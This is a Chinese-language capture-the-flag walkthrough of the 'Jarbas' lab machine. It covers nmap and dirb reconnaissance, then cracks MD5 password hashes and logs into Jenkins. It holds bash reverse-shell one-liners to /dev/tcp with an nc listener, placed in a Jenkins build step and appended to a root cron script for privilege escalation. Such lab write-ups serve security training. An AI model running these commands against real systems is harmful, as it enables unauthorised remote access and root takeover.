0x01 主机发现
本机:192.168.63.128
目标机:192.168.63.133
通过nmap进行扫描:
nmap -sn 192.168.63.0/24
0x02 nmap扫描
2.1 端口扫描
nmap --min-rate 10000 -p- 192.168.63.133
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-18 11:10 CST
Nmap scan report for 192.168.63.133
Host is up (0.0017s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:0C:29:8B:76:DE (VMware)Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds
2.2 服务信息扫描
nmap -sT -sV -O -p22,80,3306,8080 192.168.63.133
Nmap scan report for 192.168.63.133
Host is up (0.00041s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:8B:76:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds
nmap -sU -p22,80,3306,8080 192.168.63.133
结果如下:
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-18 11:16 CST
Nmap scan report for 192.168.63.133
Host is up (0.00030s latency).PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
3306/udp closed mysql
8080/udp closed http-alt
MAC Address: 00:0C:29:8B:76:DE (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
2.3 漏洞扫描
nmap --script=vuln -p22,80,8080,3306 192.168.63.133
结果如下:
Nmap scan report for 192.168.63.133
Host is up (0.00026s latency).PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.63.133
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.63.133:80/
| Form id: wmtb
| Form action: /web/submit
|
| Path: http://192.168.63.133:80/
| Form id:
| Form action: /web/20020720170457/ http://jarbas.com.br:80/user.php
|
| Path: http://192.168.63.133:80/
| Form id:
|_ Form action: /web/20020720170457/ http://jarbas.com.br:80/busca/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.63.133:80/index_arquivos/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/njarb_data/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/njarb_data/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/njarb_data/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/njarb_data/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=D%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.63.133:80/index_arquivos/?C=S%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:8B:76:DE (VMware)Nmap done: 1 IP address (1 host up) scanned in 34.81 seconds
0x03 web渗透
界面如下:
对应8080端口为登录界面
3.1 目录爆破
针对80端口进行目录爆破
dirb http://192.168.63.133
结果如图:
DIRB v2.22
By The Dark Raver
START_TIME: Wed Jan 18 11:25:38 2023
URL_BASE: http://192.168.63.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txtGENERATED WORDS: 4612
---- Scanning URL: http://192.168.63.133/ ----
- http://192.168.63.133/cgi-bin/ (CODE:403|SIZE:210)
http://192.168.63.133/index.html (CODE:200|SIZE:32808)
END_TIME: Wed Jan 18 11:25:41 2023
DOWNLOADED: 4612 - FOUND: 2
由于无有用信息,可以尝试更换工具或者加入参数
在尝试不同工具后,发现没有结果
那么考虑加入后缀,使用html或者php的后缀扫描
dirb http://192.168.63.133 -X .html,.php
DIRB v2.22
By The Dark Raver
START_TIME: Wed Jan 18 11:28:25 2023
URL_BASE: http://192.168.63.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]GENERATED WORDS: 4612
---- Scanning URL: http://192.168.63.133/ ----
- http://192.168.63.133/access.html (CODE:200|SIZE:359)
http://192.168.63.133/index.html (CODE:200|SIZE:32808)
END_TIME: Wed Jan 18 11:28:31 2023
DOWNLOADED: 9224 - FOUND: 2
上面有一个access.html可以尝试访问
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
可以发现上述为md5
解密后如下:
tiago:italia99
trindade:marianna
eder:vipsu
尝试上述为登录密码
3.2 8080端口登录
通过上述的账号登录,发现eder的可以登录,界面如下:
Jenkins为一个网站框架,可以尝试查看本身的漏洞尝试
3.3 Jenkins渗透
可以尝试新建项目
选择excute shell直接执行shell尝试是否可以利用
/bin/bash -i >& /dev/tcp/192.168.63.128/4444 0>&1
上面命令将shell返回到kali的机器,kali通过监听4444端口进行获取shell
nc -lvnp 4444
然后让上述命令执行,通过build now进行执行
成功获取shell
Jenkins中也有一个正在执行的项目
0x04 Crontab提权
whoami
uname -a
sudo -l
cat /etc/passswd #查看有哪些账号
当前账户:
jenkins
系统版本:
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
通过查看账号发现有如下账号:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
这里已经获得的shell为部分权限shell,所以尝试获取root权限
所以尝试获取Crontab信息,该文件主要是自动任务相关,所以查看其中的内容
路径为/etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
后面发现有一个脚本5min执行,并且为root权限,所以利用该脚本提权,查看该脚本内容:
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
内容为删除日志文件,那么我们在里面直接写入我们的脚本内容
echo "/bin/bash -i >& /dev/tcp/192.168.63.128/4443 0>&1" >> /etc/script/CleaningScript.sh
获取了root权限,获取flag
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!
Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)
Thanks for appreciating this machine.
@tiagotvrs
0x05 总结
- Jenkins框架渗透
- 自动任务提权
- 目录扫描